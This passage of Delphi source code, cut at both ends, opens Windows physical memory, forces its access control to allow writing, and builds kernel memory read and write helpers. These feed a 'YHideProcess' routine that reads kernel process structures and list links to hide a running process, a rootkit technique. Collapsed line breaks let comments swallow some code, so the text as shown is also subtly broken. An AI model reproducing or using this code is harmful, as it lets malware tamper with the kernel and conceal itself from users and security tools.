Result := True; end; //---------------------------------------------------------------------------
procedure CloseNTDLL; begin if (0 <> g_hNtDLL) then FreeLibrary(g_hNtDLL); g_hNtDLL := 0; end; //---------------------------------------------------------------------------
status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
if (status = STATUS_ACCESS_DENIED) then begin ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM);
status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes); end;
if not (LongInt(status) >= 0) then begin Result := 0; Exit; end;
g_pMapPhysicalMemory := MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
if (g_pMapPhysicalMemory = nil) then begin Result := 0; Exit; end;
Result := g_hMPM; end; //--------------------------------------------------------------------------- function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer; var VAddr, PGDE, PTE, PAddr, tmp: DWORD; begin VAddr := DWORD(addr); // PGDE := BaseAddress[VAddr shr 22]; PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.
if 0 = (PGDE and 1) then begin Result := nil; Exit; end;
tmp := PGDE and $00000080;
if (0 <> tmp) then begin PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF); end else begin PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000)); // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12]; PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.
if (0 = (PTE and 1)) then begin Result := nil; Exit; end;
PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF); UnmapViewOfFile(Pointer(PGDE)); end;
Result := Pointer(PAddr); end; //---------------------------------------------------------------------------
function GetData(addr: Pointer): DWORD; var phys, ret: DWORD; tmp: PDWORD; begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
if (nil = tmp) then begin Result := 0; Exit; end;
// ret := tmp[(phys and $FFF) shr 2]; ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot. UnmapViewOfFile(tmp);
Result := ret; end; //---------------------------------------------------------------------------
function SetData(addr: Pointer; data: DWORD): Boolean; var phys: DWORD; tmp: PDWORD; begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
if (nil = tmp) then begin Result := false; Exit; end;
// tmp[(phys and $FFF) shr 2] := data; PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot. UnmapViewOfFile(tmp);
Result := TRUE; end; //--------------------------------------------------------------------------- {long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) begin ExitProcess(0); return 1 ; end } //---------------------------------------------------------------------------
function YHideProcess: Boolean; var thread, process: DWORD; fw, bw: DWORD; begin // SetUnhandledExceptionFilter(exeception); if (FALSE = InitNTDLL) then begin Result := FALSE; Exit; end;
if (0 = OpenPhysicalMemory) then begin Result := FALSE; Exit; end;
thread := GetData(Pointer($FFDFF124)); //kteb process := GetData(Pointer(thread + $44)); //kpeb
if (0 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $A0)); bw := GetData(Pointer(process + $A4));